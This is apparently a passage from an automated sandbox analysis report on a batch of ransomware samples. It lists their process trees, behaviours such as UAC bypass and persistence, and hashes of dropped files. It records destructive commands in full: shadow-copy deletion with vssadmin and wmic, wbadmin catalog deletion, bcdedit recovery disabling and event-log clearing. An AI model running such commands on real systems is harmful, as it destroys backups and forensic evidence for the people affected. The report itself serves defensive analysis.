      • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
        "HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1912
    • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c.exe
      HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:1576
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Loads dropped DLL
        • Enumerates connected drives
        • Sets desktop wallpaper using registry
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        PID:1108
        • C:\Windows\SysWOW64\shell.exe
          "C:\Windows\system32\shell.exe" "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2588
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 256
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2220
            • C:\Windows\SysWOW64\Shell.exe
              "C:\Windows\system32\Shell.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1972
            • C:\Windows\SysWOW64\Shell.exe
              "C:\Windows\system32\Shell.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2092
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.MSIL.Agent.gox-38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c.exe
      Trojan-Ransom.MSIL.Agent.gox-38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2492
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kpuo-9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816.exe
      Trojan-Ransom.Win32.Blocker.kpuo-9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816.exe
      2⤵
      • Modifies WinLogon for persistence
      • Modifies visibility of file extensions in Explorer
      • Modifies visiblity of hidden/system files in Explorer
      • Disables RegEdit via registry modification
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system executable filetype association
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • System policy modification
      PID:2524
      • C:\Windows\xk.exe
        C:\Windows\xk.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2720
      • C:\Windows\SysWOW64\IExplorer.exe
        C:\Windows\system32\IExplorer.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1648
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1604
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2848
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2136
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2360
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1856
      • C:\Windows\xk.exe
        C:\Windows\xk.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2240
      • C:\Windows\SysWOW64\IExplorer.exe
        C:\Windows\system32\IExplorer.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1824
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:636
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1720
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:3028
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1972
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2936
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
      Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
      2⤵
      • UAC bypass
      • Drops file in Drivers directory
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Installs/modifies Browser Helper Object
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Modifies Internet Explorer start page
      • Modifies registry class
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:2556
      • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
        C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe /nstart
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Users\Admin\AppData\Local\Temp\nhgqubm.exe
        C:\Users\Admin\AppData\Local\Temp\nhgqubm.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2484
      • C:\Windows\system32\Rundll32.exe
        Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Local\Temp\~ugdhcvr.inf
        3⤵
        • Adds Run key to start application
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2204
        • C:\Windows\system32\runonce.exe
          "C:\Windows\system32\runonce.exe" -r
          4⤵
          • Checks processor information in registry
          PID:2372
      • C:\Users\Admin\AppData\Local\Temp\gonbqig.exe
        C:\Users\Admin\AppData\Local\Temp\gonbqig.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • C:\Users\Admin\AppData\Local\Temp\puashkr.exe
        C:\Users\Admin\AppData\Local\Temp\puashkr.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
      • C:\Windows\system32\Rundll32.exe
        Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Local\Temp\~chtpbqp.inf
        3⤵
        • Adds Run key to start application
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
        • C:\Windows\system32\runonce.exe
          "C:\Windows\system32\runonce.exe" -r
          4⤵
          • Checks processor information in registry
          PID:2276
      • C:\Windows\system32\cmd.exe
        cmd /c C:\Users\Admin\AppData\Local\Temp\pLhO8GB.bat
        3⤵
          PID:1520
        • C:\Windows\system32\cmd.exe
          cmd /c C:\Users\Admin\AppData\Local\Temp\iLSpLtV.bat
          3⤵
            PID:2292
        • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.llqn-8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217.exe
          Trojan-Ransom.Win32.Blocker.llqn-8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217.exe
          2⤵
          • Modifies WinLogon for persistence
          • Modifies visibility of file extensions in Explorer
          • Modifies visiblity of hidden/system files in Explorer
          • Disables RegEdit via registry modification
          • Disables cmd.exe use via registry modification
          • Executes dropped EXE
          • Modifies system executable filetype association
          • Modifies WinLogon
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2392
          • C:\Windows\explorer.exe
            C:\Windows/explorer.exe
            3⤵
              PID:2788
            • C:\Windows\SysWOW64\taskmgr.exe
              C:\Windows/system32/taskmgr.exe
              3⤵
              • System Location Discovery: System Language Discovery
              PID:352
          • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Gen.hjl-a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39.exe
            Trojan-Ransom.Win32.Gen.hjl-a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39.exe
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Users\Admin\AppData\Local\Temp\teiod.exe
              123 \\.\pipe\E86A104A-9366-4921-856A-6C2B3065C184
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:668
            • C:\Users\Admin\AppData\Local\Temp\teikv.exe
              123 \\.\pipe\0E8EBAA4-E8E1-4A42-8075-A1DAE7FA26EF
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1972
            • C:\Users\Admin\AppData\Local\Temp\_abp.exe
              "C:\Users\Admin\AppData\Local\Temp\_abp.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
                4⤵
                  PID:2276
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
                  4⤵
                    PID:1776
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                    4⤵
                      PID:1280
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
                      4⤵
                        PID:2116
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
                        4⤵
                          PID:1516
                      • C:\Windows\SysWOW64\notepad.exe
                        "C:\Windows\system32\notepad.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2224
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Purgen.fk-713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22.exe
                      Trojan-Ransom.Win32.Purgen.fk-713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22.exe
                      2⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops desktop.ini file(s)
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:2152
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\__t7427.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1696
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\__t1E2C.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1356
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\tmp1E3C.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2468
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                      Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:2976
                      • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                        "C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe" g
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1324
                      • C:\Windows\SysWOW64\shell.exe
                        "C:\Windows\system32\shell.exe" "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:592
                      • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                        "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Sets desktop wallpaper using registry
                        • System Location Discovery: System Language Discovery
                        • Modifies Control Panel
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        PID:2416
                        • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                          "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:1756
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:3068
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:592
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:1616
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Modifies Internet Explorer settings
                          PID:1452
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1540
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "N0mFUQoa"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2112
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f16184093.vbs"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2580
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2028
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Shade.pho-414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2.exe
                      Trojan-Ransom.Win32.Shade.pho-414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2.exe
                      2⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of UnmapMainImage
                      PID:1848
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                    1⤵
                    • System Location Discovery: System Language Discovery
                    PID:1192
                  • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
                    "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Modifies registry class
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious use of SetWindowsHookEx
                    PID:1692

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\PerfLogs\Admin\KWNLVP-DECRYPT.txt

                    Filesize

                    8KB

                    MD5

                    19e999a5a8ebf5fa012bbd555017f37a

                    SHA1

                    586e8650b4a3250e75cebeae332fea3af4489d76

                    SHA256

                    1d2cc5f00db6837e086d394762d6a1ea345856a6f84e168e383a90fbfa518bea

                    SHA512

                    d7ea9c6eb985d63a33c2a92dd1b406ebbfc9de142fab3ef2d2353a57ebd4acc371d9c66ab4903eb65b90ae16ce20cf960983b088ee322cca7e5dba0df1f6a4ab

                  • C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

                    Filesize

                    27KB

                    MD5

                    045e4a7ba3ac20222576eb2b08dbcbab

                    SHA1

                    00ef15925fea3dae1efe2f3a04a837a2a42bf895

                    SHA256

                    c2cfb1faef8c03bfc854a63b0650cf55b467b0d69e015817c1c4a5cdcd573baf

                    SHA512

                    c7c608fe9d871fa68f6d8e3f02b31f93eafc4bf809a3606a0219d416a67b0555ba00fbb0b733e5eaac7f3bf464edf0514744bab4cc6a17a68d45c82c35edee37

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif

                    Filesize

                    6KB

                    MD5

                    b2e86b1d107d1bbad0422b73f34d6e90

                    SHA1

                    dd19b1a242ef62c184b09beb25aae38228164d89

                    SHA256

                    90eb00f28550c381219a5b81405937dba56c4d6ad54b7ac19bf7f3c877f869c8

                    SHA512

                    e22e40d1637d6f4a458ad088f0528a1f3b1aa7571a6c2ff49b5c6eaea6901b511c839d48edf571592d92771975c5d6d25e1658abba2dfa0788196d867281cb09

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF

                    Filesize

                    26KB

                    MD5

                    9f3a244103af4873bd2546a501510ef5

                    SHA1

                    b192805f674152fcf542b9768682e54f14fd9694

                    SHA256

                    dc06c38b376b0fc4ff363e145dacb8c6e6d0233149cb8762a146a11db13bb7df

                    SHA512

                    b38950913e221a1776d51d03d3fea237ada29ece723a0cb9745543678ed4c91d03e645bd610630eece9f35d47aa1325eb931f15f6b8f6f3b01815c06d1c0fd3e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\BG_ADOBE.GIF

                    Filesize

                    24KB

                    MD5

                    b6e6024843f843fa0eeadb960c7568ee

                    SHA1

                    72ad4e61ada3a77d8a3e9c51d1346d0098925abb

                    SHA256

                    91d16bee1a923bd48de87eea5c7022552ae69dc7e2d2d15f0f7010310c50f46c

                    SHA512

                    c0c71f0be5468f8fd89d0799693fa5fd80ff3d4e422c15b22910eff3e98a7e11c9d72183d0bc1eeb29b1dff1e26b2834918e789e9ac99c9706537693fd00fc0c

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg

                    Filesize

                    7KB

                    MD5

                    34aaea3aff49eb1caa83392e02060af1

                    SHA1

                    5252823cf0b5d96c5767aaaccaa2630607ee170d

                    SHA256

                    f683ede42f9a86f3bc95a073f5e079e675c8d858f127373ab1bebdf1b2b152d6

                    SHA512

                    bf483cd4e2d2fc297427740126ddbdef9f5c5c6231cb088fe8e548f51ad5daa52dbbb2486926c9ee6eaa52319decbaee054e80a67acf25f8024a02cf47329a84

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg

                    Filesize

                    5KB

                    MD5

                    45da053d69e7cc99f17bee9a4978f645

                    SHA1

                    7c4e74ce599fadaa77a54c02ea81a69f4b07a497

                    SHA256

                    2b087965af44c65b9894fb09b637e8ff438924c2c8a26657f7e006e64105ab89

                    SHA512

                    9bfd5d45e09ebad6e2e14fd05c2406b3c58588ae1c79d5ee793d1bdf27a1bb169b223d76f0bcba7e0983426a26d9a4c3a936dd325491e9acaf31a7cc547db086

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif

                    Filesize

                    5KB

                    MD5

                    a357856e93f748b59bd69710e5a26c3a

                    SHA1

                    629fab605dd8ee36c58794e6007fcc13256f8a2c

                    SHA256

                    04ff4facc4b1d1a7448c0e7ce77b46ee8dd789a3c73c321b2a61f1b16837bdc9

                    SHA512

                    e544b5ce237ae88b6287b64edbf07fb9d96c38ae69f9f235d0b38f74144468906a43ca106180e2ec907b38ce221b0a38a8b68c90a35261fc2fbf192bf3423b1e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif

                    Filesize

                    31KB

                    MD5

                    d67fe5c2287ebcfd2f493dfb81f3415d

                    SHA1

                    ad77d68079c186993fd6a7080ef07744e50a6e75

                    SHA256

                    d6d25daae18f5d9ae2108b622e5609a2fbe3d0c494fc1e620e98a2b6c2695c9f

                    SHA512

                    fbe53e9443c22bc1b4656014bc95bc117f8d133610a31ff6e130f3d6be3012a2e024d44c64e3e90583b26e288be0773e1fcb7dbe5328674c3a36b7a8b41221e4

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Earthy.gif

                    Filesize

                    4KB

                    MD5

                    4abeb2bfd1babab9f1ccbd7669b26a51

                    SHA1

                    e1692a7af981d3d4cbe18793afba8488f5878e0e

                    SHA256

                    8593a71c727d065a091ccf50f6e12d8e3422bd8482c987d55c69f965f47704b5

                    SHA512

                    e4386e114e6c06cfc6a5cd87e74eab49daf05c2ccb3ff8e67c88b74c1d032fd0d2f16a017aefa93400361e86733680e707b74064723bf0fdf9d7780797b604ab

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif

                    Filesize

                    19KB

                    MD5

                    80dd35cdaf8d5288afe750a7c81cab95

                    SHA1

                    6aa4c2f4725f6529e2e94491701e35f507999683

                    SHA256

                    a10ca1f6a4638c86599614f78796f0d19daaf6c0d067818f4380fc7e9bc3fbc3

                    SHA512

                    5368ba868ec371f794f6506b114ed6fd52695042d5f8dce6b68148307eadc536fac3eed8e022c6dd3a610a9ee51d38339d798d9a1ab201222a0bc932db30d1a2

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_GreenTea.gif

                    Filesize

                    21KB

                    MD5

                    306409d4c2502cb7daf296094f248019

                    SHA1

                    5f7bf343cbb4be7ae25ef4430838f893271ec62d

                    SHA256

                    a7b5aaf02f83431c932813e13b632411949c1cb1b43855da48041faa721ceedd

                    SHA512

                    23c1e02c574bc0c3104555637793fdddc83996ba90f2013bf419e67598c6109330befbfb860ce9443bc1949c1d793e444d73eb48e8ccf8fe1b64a0b1548358d2

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif

                    Filesize

                    8KB

                    MD5

                    8f334c5edadd299b8f668928585dbdf4

                    SHA1

                    79c72e8f2494afffe0c019c540aeed72693c2733

                    SHA256

                    2c5d6c044aa3971edfaea58cdb11d1ad97424846b5078a3a3b659472ec012988

                    SHA512

                    8452b64545f451116c9bdd1cb8841df8eadfc078ea185a6f8d476aefbe68b878f6abe91e33fff16271eee3a5ffa42b35bf62542952ff2d34060fe6243e1eb092

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif

                    Filesize

                    15KB

                    MD5

                    a04c9e5f50f03edb59a997efa3a3d7ee

                    SHA1

                    3db5fafafb70b0093b46bdb5479ec999a57e85bd

                    SHA256

                    aa8bb5c389e95131b7a8f7a3583d5abcec3872ce23cf9ccb169457c690746086

                    SHA512

                    97c8b6c7421aa4271e151682531e2312e146aab81aab5fae5215b6a67c320e14cf4c20e41d29b4301eaa314a4fbc7ab526d6a92abf8138e5bce3797a9190cf7f

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif

                    Filesize

                    6KB

                    MD5

                    950f66bfa8a8620e46ef7dbe035a2760

                    SHA1

                    8ca2584eb8baa9ef0c76509037680b981bc5e65e

                    SHA256

                    f736714bd1817ec67cc3673c905e484a6b05a2f45da6f6995b0bc620c4b813ac

                    SHA512

                    a1cf1e9f06423db54c66384ec3d185148eede3eea43a4d7eedd3db0b039cf9412670436a7b55cc619fbb726c2eb087d1cdaae66d7c428cbf529d265e2baec08e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif

                    Filesize

                    20KB

                    MD5

                    6e98393a66e758c7c60e9cdc8e107a9d

                    SHA1

                    4f531b327d9b95b8ad69f1d904066c9312ad3bdb

                    SHA256

                    d03a74778f24be3392ecad9d327baf74d345be07870208ba1a0915bd7a191387

                    SHA512

                    27f4fbb68b6a01587906bd5a296d39fe99fb3631984a33bfad399b3818659fc88ca1747bddb88e4d031bcab71f92f3b5d45e464dd33d0365413160939c1f91ae

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif

                    Filesize

                    6KB

                    MD5

                    28bd5f44f00db6f4f7f3ab6d611bf218

                    SHA1

